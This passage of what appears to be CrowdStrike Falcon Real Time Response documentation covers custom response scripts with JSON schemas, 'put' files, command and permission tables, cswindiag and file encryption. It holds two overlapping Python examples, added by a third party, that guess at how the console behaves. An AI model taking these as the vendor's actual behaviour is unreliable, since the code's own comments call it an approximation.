      runscript -CloudFile="test script 2" -CommandLine=```'{"name": "Tim"}'```

      For more info about these capabilities, see JSON encoder and decoder.

Generating schemas

For the schemas, the format is standard JSON schema, defined in Specification | JSON Schema. The system generally uses the type to know what type of field to expect and can use the format to match it to a workflow field type.

Instead of producing the schemas yourself though, you can provide sample JSON that matches the expected format and let the Falcon console create the schemas for you. See Script dialog field descriptions and the description for either Input schema or Output schema.

Note: The generated JSON schemas make all fields required. You can edit those schemas so that optional fields are no longer in the required properties. Making input fields not required is typically safe. However, making output fields not required can result in failed workflow actions.
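
As an added example (written for this page, not CrowdStrike's code) that ties together Accepting and producing JSON in your scripts and Generating schemas: the Python below reproduces the shape of the schema the console generates from sample JSON (an object with typed properties and every field required), lets you mark input fields optional as the note above suggests, validates a script's input and output against those schemas, and refuses the reserved field names device_id and stdout. The generation and validation logic is my approximation of what the console does, not its actual implementation; the function names are assumptions.

```python
# Added example, not CrowdStrike's code. Generate console-style JSON schemas
# from sample JSON, validate script input/output against them, and enforce
# the reserved names the page lists (device_id for input, stdout for output).
import json
from datetime import datetime

SCHEMA_URI = "https://json-schema.org/draft/2020-12/schema"
RESERVED = {"input": {"device_id"}, "output": {"stdout"}}

# JSON Schema type names and the Python check for each; order matters because
# bool is a subclass of int in Python.
_TYPE_CHECKS = {
    "string": lambda v: isinstance(v, str),
    "boolean": lambda v: isinstance(v, bool),
    "integer": lambda v: isinstance(v, int) and not isinstance(v, bool),
    "number": lambda v: isinstance(v, (int, float)) and not isinstance(v, bool),
    "array": lambda v: isinstance(v, list),
    "object": lambda v: isinstance(v, dict),
    "null": lambda v: v is None,
}


def _json_type(value):
    for name, check in _TYPE_CHECKS.items():
        if check(value):
            return name
    raise TypeError("value is not JSON-typed: %r" % (value,))


def schema_from_sample(sample, kind):
    """Generate a schema the way the console does: every sample field becomes required.

    `kind` is "input" or "output" and selects which reserved field name to refuse.
    """
    if kind not in RESERVED:
        raise ValueError("kind must be 'input' or 'output'")
    if not isinstance(sample, dict):
        raise TypeError("sample JSON must be an object")
    reserved = set(sample) & RESERVED[kind]
    if reserved:
        raise ValueError("reserved %s field name: %s" % (kind, ", ".join(sorted(reserved))))
    return {
        "$schema": SCHEMA_URI,
        "properties": {key: {"type": _json_type(value)} for key, value in sample.items()},
        "required": sorted(sample),
        "type": "object",
    }


def make_optional(schema, *fields):
    """Drop fields from `required` (safe for input; risky for output, per the page)."""
    schema["required"] = [f for f in schema["required"] if f not in fields]
    return schema


def validate(instance, schema):
    """Minimal validator for the generated schemas: object, required fields, property types."""
    if not isinstance(instance, dict):
        return ["expected a JSON object"]
    errors = ["missing required field: " + f
              for f in schema.get("required", []) if f not in instance]
    for field, spec in schema.get("properties", {}).items():
        if field in instance and not _TYPE_CHECKS[spec["type"]](instance[field]):
            errors.append("field %s: expected %s" % (field, spec["type"]))
    return errors


# Schemas for the page's "Hello, World" script, generated from constructed sample JSON.
INPUT_SCHEMA = schema_from_sample({"name": "Tim"}, "input")
OUTPUT_SCHEMA = schema_from_sample({"Message": "Hello, Tim", "Date": "2025-01-10T09:00:00"}, "output")


def run_hello_script(command_line_json):
    """Python counterpart of the page's PowerShell script, with both schemas enforced."""
    data = json.loads(command_line_json)
    problems = validate(data, INPUT_SCHEMA)
    if problems:
        raise ValueError("input rejected: " + "; ".join(problems))
    out = {"Message": "Hello, " + data["name"], "Date": datetime.now().isoformat()}
    problems = validate(out, OUTPUT_SCHEMA)
    if problems:
        raise ValueError("output rejected: " + "; ".join(problems))
    return out


if __name__ == "__main__":
    print(json.dumps(INPUT_SCHEMA, indent=2))
    print(json.dumps(run_hello_script('{"name": "Tim"}')))
    print(validate({}, INPUT_SCHEMA))
```

Validating the output before emitting it catches the failure mode the note describes: a workflow consuming the action expects every field in the output schema, so a script that sometimes omits one would otherwise fail at the workflow step rather than in the script.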

Example: Creating a custom script to use with a workflow

This example shows how to create a script and share it with workflows. The example does not show how to update workflows to use the script. For that info, see Fusion SOAR.

Note: If your script requires no input, you do not need to create an input JSON schema. If the output does not need to be separated into multiple fields, you do not need to create an output JSON schema: The output all goes into the stdout field.

This “Hello, World” example uses a PowerShell script, input schema, and output schema.

  1. Go to Host setup and management > Response and containment > Response scripts and files.

  2. Click Create script.

  3. Provide a name, description, and shell type for the script.

  4. Set permissions to RTR Administrator or RTR Administrator and RTR Active Responder.

  5. Click Share with workflows.

  6. On the Script tab, paste the following script:

    $name = $args[0] | ConvertFrom-Json | Select -ExpandProperty 'name';
    $date = Get-Date;
    $out = @{
        Message = "Hello, $name"
        Date = $date.DateTime
    }
    $out | ConvertTo-Json;

  7. Create an input JSON schema using JSON.

    On the Input schema tab, find the Convert JSON to JSON schema text and click the + icon on the same line. Paste the following sample input JSON into the new field and click Convert.

    {"name": "Tim"}

    Here’s the resulting generated input JSON schema:

    {
      "$schema": "https://json-schema.org/draft/2020-12/schema",
      "properties": {
        "name": {
          "type": "string"
        }
      },
      "required": [
        "name"
      ],
      "type": "object",
      "description": "This generated schema may need tweaking. In particular format fields are attempts at matching workflow field types but may not be correct."
    }

    Tip: After you generate the schema, you can edit it to better suit your needs. For example, you might want to clarify in the Workflows UI what name the name field refers to. So to show the label of the field as "Your Name" in the Workflows UI, you would add a "Title": "Your Name" line:

    ...
        "name": {
          "type": "string",
          "Title": "Your Name"
        }
    ...

    Also for string input, you can show a dropdown list in the Workflows UI by adding a "ui:component": "select" line. The dropdown list shows all the string fields from the data.

    To create options when using an action in the Workflows UI, you can add enums to the schema. You can also set a default, as shown in this example.

    "enumWithDefault": {
          "type": "string",
          "enum": ["foo", "bar", "foobar"],
          "default": "foobar"
        },

    Lastly for string input, to show a dropdown list in the Workflows UI where the options are based on all the fields in the data that match a certain format, you add a "format": "<value>" line where <value> is one of the following format values:

    • cveID
    • date-time
    • email
    • hostname
    • ipv4
    • ipv6
    • localFilePath
    • localRegistryName
    • localRegistryPath
    • mac
    • networkPort
    • sha256
    • md5
    • url

  8. Create an output JSON schema using JSON.

    On the Output schema tab, find the Convert JSON to JSON schema text and click the + icon on the same line. Paste the following sample output JSON into the new field and click Convert.

    {"Message": "Hello, Tim", "Date": "Wed Dec 15 23:14:27 UTC 2021"}

    Here’s the resulting generated output JSON schema:

    {
      "$schema": "https://json-schema.org/draft/2020-12/schema",
      "properties": {
        "Date": {
          "type": "string"
        },
        "Message": {
          "type": "string"
        }
      },
      "required": [
        "Message",
        "Date"
      ],
      "type": "object",
      "description": "This generated schema may need tweaking. In particular format fields are attempts at matching workflow field types but may not be correct."
    }

    Tip: Just like with the input schema, after you generate the output schema, you can refine it. For example, you might want the date to be recognized as a timestamp and not just a string. In this case, you would add a "format": "date-time" line:

    ...
        "Date": {
          "type": "string",
          "format": "date-time"
        },
    ...

    With this addition, the workflow system recognizes the date as a timestamp and makes the field available for use in workflow actions that require a timestamp.

    Including the date-time value from the example, the useful format values include:

    • cveID
    • date-time
    • email
    • hostname
    • ipv4
    • ipv6
    • localFilePath
    • localRegistryName
    • localRegistryPath
    • mac
    • networkPort
    • sha256
    • md5
    • url

  9. On the Comments tab, provide text that will be helpful when viewed in the audit log.

  10. Leave the Running this script could lead to unexpected system behavior option as is.

  11. Click Create.
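The following Python script is an added example (not CrowdStrike's code) that ties the runscript JSON contract and the schema walkthrough above together: it derives a draft 2020-12 schema from sample JSON the way the Convert JSON to JSON schema step does in this example (all fields required, the same $schema and description), applies the Title and date-time tweaks from the tips, and validates what a response script wrote to stdout against the output schema. The generator's type mapping, and the treatment of date-time as an RFC 3339 timestamp (JSON Schema's definition) that the workflow system would reject like a missing required field, are assumptions; the sample values are the page's own.

```python
"""Mimic the console's "Convert JSON to JSON schema" step and check a response
script's input and output against the resulting schemas (added example, not CrowdStrike's code)."""
from __future__ import annotations

import json
from datetime import datetime
from typing import Any

SCHEMA_URI = "https://json-schema.org/draft/2020-12/schema"
GENERATED_NOTE = ("This generated schema may need tweaking. In particular format fields "
                  "are attempts at matching workflow field types but may not be correct.")
# Python value -> JSON Schema type name (assumed mapping; bool is listed before int
# because bool is a subclass of int in Python).
_TYPE_NAMES = {bool: "boolean", int: "integer", float: "number", str: "string"}
_JSON_TYPES = {"object": dict, "array": list, "string": str, "boolean": bool, "null": type(None)}


def generate_schema(sample: Any, top: bool = True) -> dict:
    """Derive a schema from sample JSON. As on the page, every key of an object
    becomes a required property and the top level carries $schema and the note."""
    if isinstance(sample, dict):
        body = {
            "properties": {k: generate_schema(v, False) for k, v in sample.items()},
            "required": list(sample),
            "type": "object",
        }
        return {"$schema": SCHEMA_URI, **body, "description": GENERATED_NOTE} if top else body
    if isinstance(sample, list):
        return {"type": "array", "items": generate_schema(sample[0], False) if sample else {}}
    for py_type, name in _TYPE_NAMES.items():
        if isinstance(sample, py_type):
            return {"type": name}
    return {"type": "null"}


def _has_type(data: Any, expected: str) -> bool:
    if expected == "integer":
        return isinstance(data, int) and not isinstance(data, bool)
    if expected == "number":
        return isinstance(data, (int, float)) and not isinstance(data, bool)
    return isinstance(data, _JSON_TYPES[expected])


def _is_rfc3339(value: str) -> bool:
    """JSON Schema's date-time is an RFC 3339 timestamp such as 2021-12-15T23:14:27Z."""
    try:
        datetime.fromisoformat(value.replace("Z", "+00:00"))
    except ValueError:
        return False
    return "T" in value


def validate(schema: dict, data: Any, path: str = "$") -> list[str]:
    """Return the violations (empty list means valid). Covers the keywords the page's
    schemas use: type, properties, required, enum and format (date-time only)."""
    errors = []
    expected = schema.get("type")
    if expected and not _has_type(data, expected):
        return [f"{path}: expected {expected}, got {type(data).__name__}"]
    if "enum" in schema and data not in schema["enum"]:
        errors.append(f"{path}: {data!r} not one of {schema['enum']}")
    if schema.get("format") == "date-time" and isinstance(data, str) and not _is_rfc3339(data):
        errors.append(f"{path}: {data!r} is not an RFC 3339 date-time")
    if isinstance(data, dict):
        for key in schema.get("required", []):
            if key not in data:
                errors.append(f"{path}.{key}: required field missing")
        for key, sub in schema.get("properties", {}).items():
            if key in data:
                errors.extend(validate(sub, data[key], f"{path}.{key}"))
    return errors


# Constructed samples: the page's own "Hello, World" input and output JSON.
SAMPLE_INPUT = {"name": "Tim"}
SAMPLE_OUTPUT = {"Message": "Hello, Tim", "Date": "Wed Dec 15 23:14:27 UTC 2021"}


def build_schemas() -> tuple[dict, dict]:
    """Generate both schemas, then apply the tweaks the page's tips describe."""
    input_schema = generate_schema(SAMPLE_INPUT)
    input_schema["properties"]["name"]["Title"] = "Your Name"  # label shown in the Workflows UI
    input_schema["required"] = []  # making input fields optional is typically safe
    output_schema = generate_schema(SAMPLE_OUTPUT)
    output_schema["properties"]["Date"]["format"] = "date-time"  # expose Date as a timestamp
    return input_schema, output_schema


def check_script_output(stdout: str, output_schema: dict) -> list[str]:
    """Validate what the response script wrote to stdout. A non-empty result is what
    the page's note says surfaces as a failed workflow action (assumed to cover
    format violations as well as missing required fields)."""
    try:
        data = json.loads(stdout)
    except json.JSONDecodeError as exc:
        return [f"stdout is not JSON: {exc}"]
    return validate(output_schema, data)


if __name__ == "__main__":
    in_schema, out_schema = build_schemas()
    print(json.dumps(in_schema, indent=2))
    # With "format": "date-time" on Date, the page's sample value no longer passes;
    # the script must emit an RFC 3339 string (for example Get-Date -Format o).
    print(check_script_output(json.dumps(SAMPLE_OUTPUT), out_schema))
    print(check_script_output('{"Message": "Hello, Tim"}', out_schema))  # Date missing
```

The second check is the caveat to keep in mind when you add "format": "date-time" to the output schema: $date.DateTime in the sample script does not produce an RFC 3339 value.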

Troubleshooting your script

If a script does not work as expected, you can gain some insight by checking the log: Go to Host setup and management > Response and containment > Response scripts and files, then click View audit log.

Deleting a custom script

Delete a response script from the Response Scripts & Files page. Click the delete icon in the Actions column for the script you want to delete.

Note: A script might be shared with workflows to use as an action in those workflows. You can delete a script that is only shared with a workflow, but you can’t delete the script if it is used in a workflow definition. Also, the console provides a link to a list of workflows that use the script so you can remove the script from a workflow or disable the workflow. Alternatively, to find the workflows that use a script, go to Workflows and use the Actions filter to match the script name.

Managing files for the put command

You can reach your existing library of files on the “put” files tab of the Response scripts and files page (Host setup and management > Response and containment > Response scripts and files).

Files uploaded for "put" are stored securely in the CrowdStrike cloud, separated from both your other Falcon data and from all other customer data.

"Put" files cannot exceed 4 GB on macOS or Windows, and 2 GB on Linux.

"Put" file names cannot contain single quote characters or exceed 128 characters in length.

Uploading a new "put" file

Reach the Upload “put” file dialog by clicking Upload file on the “put” files tab of the Response scripts and files page (Host setup and management > Response and containment > Response scripts and files).

File upload time is limited to 5 minutes. If the upload will take longer than 5 minutes, you can use the POST /real-time-response/entities/put-files/v1 API endpoint to upload your file without the timeout restriction.

Upload file dialog field descriptions

Select file: Choose the file you want to upload

Name: Give the file a unique name that helps indicate what it is.

File description: Provide a description that will help you and others remember when and why to put it on a host.

Comment for audit logs: Add any additional notes about the file.

Deleting a “put” file

Files uploaded to the cloud for put purposes do not expire but can be deleted by users with the RTR Administrator role on the Host setup and management > Response and containment > Response scripts and files page. To delete a file, click Open menu and click Delete file.

Real Time Response commands

Tip: Run the help command in a real time response session to see the list of commands available to you.

Real Time Response commands and platforms

| Command | Description | Windows | macOS | Linux |
|---|---|---|---|---|
| cat | Display contents of a file | Y | Y | Y |
| cd | Change the current working directory | Y | Y | Y |
| clear | Clear screen | Y | Y | Y |
| cp | Copy a file or directory | Y | Y | Y |
| csrutil | Get System Integrity Protection status | N | Y | N |
| cswindiag | Run CrowdStrike Windows diagnostic tool | Y | N | N |
| encrypt | Encrypt a file with an encryption key. CrowdStrike provides the decryption script to run on your workstation to decrypt the encrypted file. | Y | Y | Y |
| env | Get environment variables for all scopes (Machine/User/Process) | Y | Y | Y |
| eventlog | Inspect event logs. Subcommands: backup, export, list, view. Note: eventlog backup is recommended over eventlog export, because it's faster to execute and has the industry-standard .evtx output file format. | Y | N | N |
| falconscript (4) | Run a Falcon script. | Y | N | N |
| filehash | Generate the MD5 and SHA256 hashes of a file | Y | Y | Y |
| get (2), (4) | Get a file from a remote host | Y | Y | Y |
| getsid | Enumerate local users and Security Identifiers (SID). Used with reg commands. | Y | Y | N |
| help | Get help on a specific command or subcommand | Y | Y | Y |
| history | View history | Y | Y | Y |
| ifconfig | Show network configuration information | N | Y | Y |
| ipconfig | Show network configuration information | Y | N | N |
| kill (4) | Kill a process | Y | Y | Y |
| ls | Display the contents of the specified path | Y | Y | Y |
| map | Map an SMB (network) share drive | Y | N | N |
| memdump (2), (4) | Generates and saves a memory dump file of a running process on a host | Y | N | N |
| mkdir | Create a new directory. Note: Newly-created directories are only accessible to members of the host’s Administrator group | Y | Y | Y |
| mount | List available drives (Windows); list or mount available drives (macOS, Linux) | Y | Y | Y |
| mv | Move a file or directory | Y | Y | Y |
| netstat (3), (4) | Display network statistics and active connections. Note: This command shows the most details using PowerShell 5.0 or later | Y | Y | Y |
| ps (4) | Display process information. Note: This command shows the most details using PowerShell 5.0 or later | Y | Y | Y |
| put (2), (4) | Put a file onto a remote host | Y | Y | Y |
| put-and-run (4) | Put an executable from the CrowdStrike cloud into a secure directory on the machine and run it. | Y | Y | N |
| pwd | Prints present working directory | N | Y | Y |
| reg query | Query a registry subkey or values | Y | N | N |
| reg set | Set registry keys or values | Y | N | N |
| reg delete | Delete registry subkeys, keys, or values | Y | N | N |
| reg load | Load a user registry hive from disk | Y | N | N |
| reg unload | Unload a previously loaded user registry hive | Y | N | N |
| restart | Restart target system | Y | Y | Y |
| rm (4) | Remove a file or directory | Y | Y | Y |
| rmdir, rmdir -r | Remove an empty directory; with -r, remove a directory and anything it contains | N | N | Y |
| run (2), (4) | Run an executable | Y | Y | Y |
| runscript (1), (4) | Run a custom script | Y | Y | Y |
| shutdown | Shutdown target system | Y | Y | Y |
| tar | Compress a file or directory into a tar file | N | N | Y |
| umount | Unmount a filesystem | N | Y | Y |
| unmap | Unmap an SMB (network) share drive | Y | N | N |
| update | Install patches through Windows Update. Subcommands: history (check Windows Update history on this host; see Microsoft docs for a full list of Windows Update Agent codes), install (install a patch by specifying a KB ID; KBs that Microsoft considers “optional” are not available), list (show all available updates for the host, based on Windows Update info), query (show metadata about a KB) | Y | N | N |
| users | Get details about local users | N | Y | Y |
| xmemdump (2) | Dump the complete or kernel memory of a system | Y | N | N |
| zip | Compress a file or directory into a zip file | Y | Y | Y |

(1) - The ability to use custom scripts is available if enabled in Response Policies.

(2) - High risk commands that are available if enabled in Response Policies.

(3) - Linux hosts must have netstat installed to run the netstat command.

(4) - Available as a Fusion SOAR workflow action. For more info, see Workflow actions.

Real Time Response commands and default user role permissions

There are 3 permission levels that grant default RTR roles permission to execute RTR commands:

  • Non-Destructive
    • Roles: RTR Read Only Analyst, RTR Active Responder, and RTR Administrator
  • Potentially Destructive
    • Roles: RTR Active Responder and RTR Administrator
  • High Privilege
    • Role: RTR Administrator only

This table describes the commands that default RTR roles can execute.

Note: All of the commands listed in this table can also be assigned to custom roles as individual permissions. For more info, see Individual command permissions for custom roles.
| Command | RTR Read Only Analyst | RTR Active Responder | RTR Administrator |
|---|---|---|---|
| cat | Y | Y | Y |
| cd | Y | Y | Y |
| clear | Y | Y | Y |
| cp | N | Y | Y |
| csrutil | Y | Y | Y |
| cswindiag | N | N | Y |
| encrypt | N | Y | Y |
| env | Y | Y | Y |
| eventlog | Y | Y | Y |
| falconscript | N | N | Y |
| filehash | Y | Y | Y |
| get (2) | N | Y | Y |
| getsid | Y | Y | Y |
| help | Y | Y | Y |
| history | Y | Y | Y |
| ifconfig | Y | Y | Y |
| ipconfig | Y | Y | Y |
| kill | N | Y | Y |
| ls | Y | Y | Y |
| map | N | Y | Y |
| memdump (2) | N | Y | Y |
| mkdir | N | Y | Y |
| mount | Y | Y | Y |
| mv | N | Y | Y |
| netstat (3) | Y | Y | Y |
| ps | Y | Y | Y |
| put (2) | N | N | Y |
| put-and-run | N | N | Y |
| pwd | Y | Y | Y |
| reg query | Y | Y | Y |
| reg set | N | Y | Y |
| reg delete | N | Y | Y |
| reg load | N | Y | Y |
| reg unload | N | Y | Y |
| restart | N | Y | Y |
| rm | N | Y | Y |
| rm, rm -r | N | Y | Y |
| run (2) | N | N | Y |
| runscript (1) | N | Y | Y |
| shutdown | N | Y | Y |
| tar | N | Y | Y |
| umount | N | Y | Y |
| unmap | N | Y | Y |
| update | N | Y | Y |
| users | Y | Y | Y |
| xmemdump (2) | N | Y | Y |
| zip | N | Y | Y |

(1) - The ability to use custom scripts is available if enabled in Response Policies.

(2) - High risk commands that are available if enabled in Response Policies.

(3) - Linux hosts must have netstat installed to run the netstat command.

Real Time Response command operating system prerequisites

Table 1. Real Time Response command operating system prerequisites

| Command | Windows Prerequisites | macOS Prerequisites | Linux Prerequisites |
|---|---|---|---|
| cat | .NET Framework 4.5 and later; PowerShell 3.0 and later | /bin/zsh (version 5.8 and later); /bin/cat | /bin/bash (version 3.0 and later); /bin/cat |
| cd | .NET Framework 4.5 and later; PowerShell 3.0 and later | /bin/zsh (version 5.8 and later) | /bin/bash (version 3.0 and later) |
| cp | .NET Framework 4.5 and later; PowerShell 3.0 and later | /bin/zsh (version 5.8 and later); /bin/cp | /bin/bash (version 3.0 and later); /bin/readlink; /bin/cp |
| csrutil | N/A | /bin/zsh (version 5.8 and later); /usr/bin/csrutil | N/A |
| encrypt | .NET Framework 4.5 and later; PowerShell 3.0 and later | /bin/zsh (version 5.8 and later); /usr/bin/openssl; /usr/bin/hexdump; /usr/bin/xxd | /bin/bash (version 3.0 and later); /usr/bin/stat; /bin/sleep; /usr/bin/openssl; /usr/bin/hexdump |
| env | .NET Framework 4.5 and later; PowerShell 3.0 and later | /bin/zsh (version 5.8 and later); /usr/bin/env | /bin/bash (version 3.0 and later); /bin/env; /usr/bin/env |
| eventlog backup | .NET Framework 4.5 and later; PowerShell 3.0 and later | N/A | N/A |
| eventlog export | .NET Framework 4.5 and later; PowerShell 3.0 and later | N/A | N/A |
| eventlog list | .NET Framework 4.5 and later; PowerShell 3.0 and later | N/A | N/A |
| eventlog view | .NET Framework 4.5 and later; PowerShell 3.0 and later | N/A | N/A |
| falconscript | .NET Framework 4.5 and later; PowerShell 3.0 and later | N/A | N/A |
| filehash | .NET Framework 4.5 and later; PowerShell 3.0 and later | /bin/zsh (version 5.8 and later); /usr/bin/shasum; /sbin/md5 | /bin/bash (version 3.0 and later); one of /bin/sha1sum or /usr/bin/sha1sum; one of /bin/sha256sum or /usr/bin/sha256sum; one of /bin/md5sum or /usr/bin/md5sum |
| get | .NET Framework 4.5 and later; PowerShell 3.0 and later; C# | N/A | /bin/bash (version 3.0 and later); /bin/readlink |
| getsid | .NET Framework 4.5 and later; PowerShell 3.0 and later | /bin/zsh (version 5.8 and later); /usr/bin/dscl; /usr/bin/dsmemberutil | N/A |
| ifconfig | N/A | /bin/zsh (version 5.8 and later); /sbin/ifconfig | /bin/bash (version 3.0 and later); /sbin/ip |
| ipconfig | .NET Framework 4.5 and later; PowerShell 3.0 and later | N/A | N/A |
| kill | .NET Framework 4.5 and later; PowerShell 3.0 and later | /bin/zsh (version 5.8 and later); /sbin/launchd; /bin/ps; /bin/kill | /bin/bash (version 3.0 and later); /bin/cat/proc; /bin/readlink |
| ls | .NET Framework 4.5 and later; PowerShell 3.0 and later; C# | /bin/zsh (version 5.8 and later); /bin/ls | /bin/bash (version 3.0 and later); /bin/ls |
| map | .NET Framework 4.5 and later; PowerShell 3.0 and later | /bin/zsh (version 5.8 and later) | N/A |
| memdump | .NET Framework 4.5 and later; PowerShell 3.0 and later | N/A | N/A |
| mkdir | .NET Framework 4.5 and later; PowerShell 3.0 and later | /bin/zsh (version 5.8 and later); /bin/mkdir | /bin/bash (version 3.0 and later); /bin/readlink; /bin/mkdir |
| mount | .NET Framework 4.5 and later; PowerShell 3.0 and later | /bin/zsh (version 5.8 and later); /sbin/mount | /bin/bash (version 3.0 and later); /bin/mount |
| mv | .NET Framework 4.5 and later; PowerShell 3.0 and later | /bin/zsh (version 5.8 and later); /bin/mv | /bin/bash (version 3.0 and later); /bin/readlink; /bin/mv |
| netstat | .NET Framework 4.5 and later; PowerShell 3.0 and later | /bin/zsh (version 5.8 and later); /usr/sbin/netstat | /bin/bash (version 3.0 and later); /bin/netstat |
| ps | .NET Framework 4.5 and later; PowerShell 3.0 and later | /bin/zsh (version 5.8 and later); /bin/ps | /bin/bash (version 3.0 and later); /bin/ps |
| pwd | N/A | /bin/zsh (version 5.8 and later); /bin/pwd | /bin/bash (version 3.0 and later); /bin/pwd |
| reg delete | .NET Framework 4.5 and later; PowerShell 3.0 and later | N/A | N/A |
| reg load | .NET Framework 4.5 and later; PowerShell 3.0 and later; C# | N/A | N/A |
| reg query | .NET Framework 4.5 and later; PowerShell 3.0 and later | N/A | N/A |
| reg set | .NET Framework 4.5 and later; PowerShell 3.0 and later | N/A | N/A |
| reg unload | .NET Framework 4.5 and later; PowerShell 3.0 and later; C# | N/A | N/A |
| restart | .NET Framework 4.5 and later; PowerShell 3.0 and later | /bin/zsh (version 5.8 and later); /bin/sleep; /sbin/reboot | /bin/bash (version 3.0 and later); /bin/sleep; /sbin/shutdown |
| rm | .NET Framework 4.5 and later; PowerShell 3.0 and later; C# | /bin/zsh (version 5.8 and later); /bin/rm | /bin/bash (version 3.0 and later); /bin/readlink; /bin/rm |
| rmdir, rmdir -r | N/A | N/A | /bin/bash (version 3.0 and later); /bin/readlink; /bin/rmdir |
| run | N/A | N/A | /bin/bash (version 3.0 and later); /bin/rm; /bin/mktemp; /usr/bin/mkfifo; /bin/cat |
| runscript | .NET Framework 4.5 and later; PowerShell 3.0 and later | /bin/zsh (version 5.8 and later); /bin/sleep | /bin/bash (version 3.0 and later); /bin/cat; /bin/sleep |
| shutdown | .NET Framework 4.5 and later; PowerShell 3.0 and later | /bin/zsh (version 5.8 and later); /bin/sleep; /sbin/shutdown | /bin/bash (version 3.0 and later); /bin/sleep; /sbin/shutdown |
| tar | N/A | N/A | /bin/bash (version 3.0 and later); /bin/readlink; one of /bin/tar or /usr/bin/tar |
| umount | .NET Framework 4.5 and later; PowerShell 3.0 and later | N/A | N/A |
| unmap | .NET Framework 4.5 and later; PowerShell 3.0 and later | N/A | N/A |
| update history | .NET Framework 4.5 and later; PowerShell 3.0 and later | N/A | N/A |
| update install | .NET Framework 4.5 and later; PowerShell 3.0 and later | N/A | N/A |
| update list | .NET Framework 4.5 and later; PowerShell 3.0 and later | N/A | N/A |
| update query | .NET Framework 4.5 and later; PowerShell 3.0 and later | N/A | N/A |
| users | N/A | /bin/zsh (version 5.8 and later); /usr/bin/dscacheutil; /usr/bin/grep | /bin/bash (version 3.0 and later); getent |
| xmemdump | .NET Framework 4.5 and later; PowerShell 3.0 and later | N/A | N/A |
| zip | .NET Framework 4.5 and later; PowerShell 3.0 and later | /bin/zsh (version 5.8 and later); /usr/bin/zip | /bin/bash (version 3.0 and later); /bin/readlink; one of /usr/bin/zip or /usr/bin/7z |

Additional notes for Windows commands

  • PowerShell Constrained Language mode is disabled by default. To run RTR commands correctly, PowerShell Constrained Language mode must not be enabled.
  • It is not possible to list all possible prerequisites for command instances of PowerShell and .NET Framework. See Microsoft’s documentation for info on how to maintain and update PowerShell and .NET.
  • Commands that require C# must have the compiler version of C# that is bundled with the version of .NET Framework that the commands are using.

Additional info: Real Time Response commands

This section provides some more details and special information about some of the Real Time Response commands. Read more information about any command by running help for the command you want to read about on the Run Commands tab.

cat

If you try to cat a file you don't have access to, you'll see an error message like:

Access to the path 'C:\myfile.txt' is denied.

Instead, run get to download the file from your browser.

cd

You can also change the current directory across volumes:

C:\> cd D:\Data

cp

If you try to cp a file you don't have access to, you'll see an error message like:

Access to the path 'C:\myfile.txt' is denied.

cswindiag

The cswindiag command gathers log files and information about the state of a Windows host and packages them into a zip file that you can send to Support.

What cswindiag gathers

  • Troubleshooting Windows Sensors - Installation Issues:

    • Sensor installation logs from %TEMP% (aka %LOCALAPPDATA%\temp)

    • Sensor cloud update logs from %SYSTEMROOT%\temp

    • Sensor crash dump files if present in %SYSTEMROOT%\system32\drivers\crowdstrike\support\crashdumps

    • Log files from %SYSTEMROOT%\INF\setupapi*.log

    • Windows installer configuration, registration data, and listings of installer cached files

    • Firewall rules, filter, and Device Control troubleshooting data

    • CrowdStrike registry keys

  • Microsoft system, NIC, and hotfix details

  • Currently installed programs and registered AV programs

  • DigiCert High Assurance EV Root CA certificate check

  • DigiCert Assured ID Root CA certificate check

  • DNS Cache Type check

  • .NET Framework version and registry data

  • BitLocker encryption status

  • Windows ELAM (Early Launch Anti-Malware) backup directory check

  • Windows Installer directory check

  • Core service dependencies status

  • Basic network details

  • Connectivity checks/configuration data (Commercial, Gov, and EU Clouds):

    • Basic cloud connectivity check

    • TLS connection tests

    • Certificate chain check

    • Supported ciphers check

    • User's proxy settings

    • Falcon sensor proxy configuration

    • SCHANNEL registry configuration

  • CID and AID details

  • Falcon sensor and related services start configuration and status

  • CS program and driver files list

  • CS policy/system registry tags

  • Currently running processes

  • Installed Microsoft patches

  • Running services details

  • Windows Event logs errors: Application and System

  • Falcon sensor event logs (if logging is enabled)

  • MSInfo32 data export

Retrieving a CSWinDiag file

Retrieve the generated CSWinDiag file locally from c:\windows\system32\drivers\crowdstrike\rtr\putrun and securely send it to Support using the CrowdStrike Customer Center. For US-GOV-1 and US-GOV-2 customers, go to the CrowdStrike Government Customer Center.

  1. After executing cswindiag, wait 3–4 minutes for processing to complete.

    Note: You are not notified when processing is finished. The average processing time is 3–4 minutes.

  2. In the RTR command window, change to the RTR working directory with one of the following commands.

    For Falcon sensor versions before 6.38:

    C:\> cd c:\windows\system32\drivers\crowdstrike\rtr\putrun

    For Falcon sensor versions 6.38 and later:

    C:\> cd c:\"program files"\crowdstrike\rtr\putrun

  3. Run the ls command to list the contents of the working directory.

    For Falcon sensor versions before 6.38:

    C:\windows\system32\drivers\crowdstrike\rtr\putrun> ls

    For Falcon sensor versions 6.38 and later:

    C:\"program files"\crowdstrike\rtr\putrun> ls

  4. CSWinDiag filenames use a common format (CSWinDiag_{hostname}_{unique_file_ID}.zip) and include a timestamp of the command execution. Find the CSWinDiag ZIP file with the latest timestamp and run get with the full filename to retrieve it.

    For Falcon sensor versions before 6.38:

    C:\windows\system32\drivers\crowdstrike\rtr\putrun> get CSWinDiag_<hostname>_mRRfqs8F.zip

    For Falcon sensor versions 6.38 and later:

    C:\"program files"\crowdstrike\rtr\putrun> get CSWinDiag_<hostname>_mRRfqs8F.zip

  5. When processing is complete, click Download to save the file to your local machine.

Sending a downloaded file to Support

Securely send Support a downloaded CSWinDiag file through the CrowdStrike Customer Center. For US-GOV-1 and US-GOV-2 customers, go to the CrowdStrike Government Customer Center. You can attach your file to a new or existing case.

Note: To ensure your privacy and security, only send files to Support through the CrowdStrike Customer Center. For US-GOV-1 and US-GOV-2 customers, go to the CrowdStrike Government Customer Center. We do not recommend using email to send files to Support, including attaching files when opening cases using email-to-case or when replying to a case by email.

encrypt

The encryption password you supply will be shown in the RTR terminal but will be obfuscated in the audit logs. If you’re specifying your own encryption key for this command, you can perform Base64 encoding and decoding using the following website: http://icyberchef.com/

Decrypting a file encrypted with the encrypt command

Note: decrypt is NOT a Real Time Response command. The information provided here is for offline decryption of files encrypted with the Real Time Response encrypt command.

Decrypt a file encrypted with the encrypt command by running the Falcon Real Time Response Decryption Script (a PowerShell script) available from Support and resources > Resources and tools > Tool downloads.

  1. Download decrypt.zip from Falcon console and extract the files from the zip archive

  2. Open a PowerShell session

  3. Change to the directory where decrypt.ps1 has been extracted

  4. Run decrypt.ps1 by providing it the path to the encrypted file and the encryption key. For example:

    C:\PS> .\decrypt.ps1 -SourceFile .\encrypted_file.exe.AES -Key

    Note: You are not required to specify the parameter names. You can also provide: C:\PS>.\decrypt.ps1 .\encrypted_file.exe.AES

